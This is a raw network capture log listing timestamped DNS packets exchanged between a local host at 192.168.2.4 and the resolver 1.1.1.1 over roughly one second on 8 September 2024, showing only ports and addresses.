                                                                                                                                                                                                            Sep 8, 2024 09:00:31.769701958 CEST5307053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.769861937 CEST6233553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.769962072 CEST5573153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.770124912 CEST5792453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.770200014 CEST4924353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.770445108 CEST6347253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.770536900 CEST5736653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.770842075 CEST5362753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.771100044 CEST5556253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.771349907 CEST5800053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.772331953 CEST5593853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.773360968 CEST6263853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.773485899 CEST53553431.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.773536921 CEST5566353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.773694992 CEST6198453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.773853064 CEST5535453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.774285078 CEST5652653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.776238918 CEST53624501.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.777992964 CEST6134953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.778342009 CEST53534861.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.778717041 CEST53497321.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.778728008 CEST53579241.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.778759956 CEST53616491.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.778970957 CEST53578241.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.779764891 CEST53557311.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.780467033 CEST53599211.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.781832933 CEST53556631.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.781898975 CEST53634721.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.782001972 CEST53536271.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.782011986 CEST53562431.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.782016993 CEST53559381.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.782393932 CEST53580001.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.782407999 CEST53555621.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.782434940 CEST53573661.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.782762051 CEST53553541.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.782989025 CEST53619841.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.783740044 CEST53626381.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.784178972 CEST53507031.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.784415960 CEST53613971.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.786705017 CEST53623351.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.786968946 CEST53530701.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.787775040 CEST53613491.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.790327072 CEST5023053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.791053057 CEST53565261.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.799201965 CEST53554721.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.801413059 CEST53492431.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.806358099 CEST53502301.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.926817894 CEST53608881.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.932779074 CEST53614331.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.933304071 CEST53534911.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.933315039 CEST53496211.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.210016012 CEST6455253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.211595058 CEST4968753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.215580940 CEST5421453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.221369028 CEST5819253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.226690054 CEST6458653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.227267981 CEST53496871.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.228173018 CEST5582553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.228216887 CEST5951053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.228676081 CEST5616853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.228846073 CEST5938653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.229671955 CEST6151153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.230160952 CEST5865453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.230645895 CEST5875453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.231177092 CEST5602053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.231363058 CEST5309653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.233870983 CEST53581921.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.233911037 CEST6252053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.233911037 CEST5898553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.233911037 CEST5193153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.233911037 CEST6174453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.233911037 CEST6545053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.233911991 CEST5206653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.237330914 CEST6106653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.237737894 CEST5760553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.238143921 CEST53645861.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.238346100 CEST53558251.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.238419056 CEST5521653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.238843918 CEST5567753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.239655972 CEST53561681.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.239689112 CEST53586541.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.239703894 CEST53615111.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.240993977 CEST53645521.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.241321087 CEST53530961.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.243521929 CEST53587541.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.244587898 CEST53520661.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.245588064 CEST53617441.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.245815039 CEST53542141.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.247049093 CEST53576051.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.248070955 CEST53552161.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.250463963 CEST53589851.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.251082897 CEST53654501.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.251713991 CEST53519311.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.252489090 CEST53560201.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.257297039 CEST6130353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.257448912 CEST6336253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.258627892 CEST6191653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.259603024 CEST53556771.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.260452986 CEST5169753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.260626078 CEST6216153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.261674881 CEST53593861.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.265224934 CEST53625201.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.266846895 CEST53633621.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.267627001 CEST53613031.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.268933058 CEST53619161.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.269236088 CEST53610661.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.273396015 CEST5131253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.277266026 CEST53621611.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.284123898 CEST53513121.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.311527014 CEST4927353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.312026978 CEST5119753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.315844059 CEST6102853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.316405058 CEST6205653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.318108082 CEST6300253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.320091963 CEST5788853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.321073055 CEST53511971.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.321826935 CEST5054153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.323683023 CEST5728453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.325737953 CEST5026253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.326355934 CEST53610281.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.326831102 CEST5123153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.327100992 CEST53620561.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.332638979 CEST53505411.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.332760096 CEST6214853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.335721016 CEST53630021.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.336309910 CEST53578881.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.336831093 CEST5821853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.337210894 CEST5163653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.337416887 CEST6273853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.337573051 CEST5729753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.337711096 CEST5149453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.338219881 CEST5151653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.338376999 CEST5488553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.339483023 CEST5754153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.340056896 CEST4933753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.342987061 CEST53502621.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.344105005 CEST53621481.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.347729921 CEST53582181.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.348073959 CEST53572971.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.348402023 CEST53627381.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.349430084 CEST53516361.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.349805117 CEST53514941.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.350158930 CEST53575411.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.351135015 CEST53493371.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.351970911 CEST53515161.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.356365919 CEST53548851.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.360260963 CEST5722053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.361185074 CEST5835653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.361396074 CEST5738553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.361705065 CEST6480853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.361871004 CEST6439353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.362015009 CEST5266453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.362145901 CEST6224053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.362282991 CEST5838753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.367908001 CEST6326153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.367923975 CEST6237353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.368108988 CEST5639553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.369903088 CEST53572201.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.370770931 CEST53648081.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.371181965 CEST53622401.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.371490955 CEST53526641.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.371507883 CEST53643931.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.373362064 CEST53573851.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.374702930 CEST53583871.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.377090931 CEST53623731.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.377099991 CEST53583561.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.378148079 CEST53632611.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.385447979 CEST53595101.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.386800051 CEST5011053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.387073040 CEST6138353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.388775110 CEST5072453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.396733999 CEST53501101.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.398288965 CEST53507241.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.400468111 CEST53563951.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.401422024 CEST53613831.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.417097092 CEST53516971.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.467010021 CEST53492731.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.478488922 CEST53572841.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.484985113 CEST53512311.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.642985106 CEST6437553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.642985106 CEST5930253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.645539045 CEST6428153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.648135900 CEST5013753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.652981997 CEST53643751.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.653779030 CEST5081153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.654620886 CEST53642811.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.655828953 CEST6382253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.657618046 CEST6410253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.657839060 CEST6313453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.658104897 CEST4994953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.658427954 CEST53501371.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.658560038 CEST6047553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.658615112 CEST5133453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.659023046 CEST6553353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.659823895 CEST5104753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.660053015 CEST6143753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.660269022 CEST5120353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.660478115 CEST5805053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.660769939 CEST5437453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.660928011 CEST5960653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.661215067 CEST6551953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.661410093 CEST5783953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.661696911 CEST6410653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.662281990 CEST5483753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.663275957 CEST6349253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.663328886 CEST53508111.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.666224957 CEST6042353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.666419029 CEST6009053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.667299986 CEST53641021.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.667593002 CEST53604751.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.668260098 CEST53499491.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.669069052 CEST53513341.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.670453072 CEST53596061.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.671266079 CEST53641061.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.672430992 CEST53634921.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.672466993 CEST53548371.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.674210072 CEST53631341.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.674294949 CEST53593021.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.675023079 CEST53510471.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.675318956 CEST53600901.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.675673962 CEST53580501.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.675828934 CEST5416853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.675901890 CEST53543741.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.676026106 CEST5503553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.676105022 CEST53604231.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.676182985 CEST53512031.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.676513910 CEST53578391.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.676907063 CEST53614371.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.681413889 CEST5471853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.686218023 CEST53550351.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.688604116 CEST5790253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.689647913 CEST53655331.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.691852093 CEST53547181.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.692368031 CEST53655191.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.699218988 CEST53579021.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.704194069 CEST5184753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.704626083 CEST5096453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.707051992 CEST5015653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.707619905 CEST53541681.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.707859039 CEST6150453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.708024025 CEST5372853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.708129883 CEST6388153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.708308935 CEST5411653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.708465099 CEST5918253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.708816051 CEST5864553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.714222908 CEST53518471.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.715676069 CEST53501561.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.716823101 CEST53615041.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.717833042 CEST53586451.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.718049049 CEST53591821.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.718128920 CEST53541161.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.723885059 CEST53537281.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.732443094 CEST5200553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.732621908 CEST4969353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.732773066 CEST5842353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.732956886 CEST5886053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.737730026 CEST4918653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.737903118 CEST5636953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.738806963 CEST5118553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.738915920 CEST5367553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.739048004 CEST5242953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.739223003 CEST6108253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.739387989 CEST6107653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.739715099 CEST6132153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.740091085 CEST6271453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.740396976 CEST4957553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.740572929 CEST5975353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.740711927 CEST6281453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.740863085 CEST5063053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.740995884 CEST5335853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.741955996 CEST6358053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.742006063 CEST53496931.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.742019892 CEST53520051.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.742031097 CEST53588601.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.743262053 CEST4965853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.743447065 CEST53584231.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.748164892 CEST53536751.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.748258114 CEST53491861.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.748410940 CEST53511851.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.748753071 CEST53524291.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.749048948 CEST53610761.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.749258041 CEST53495751.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.749411106 CEST53613211.1.1.1192.168.2.4
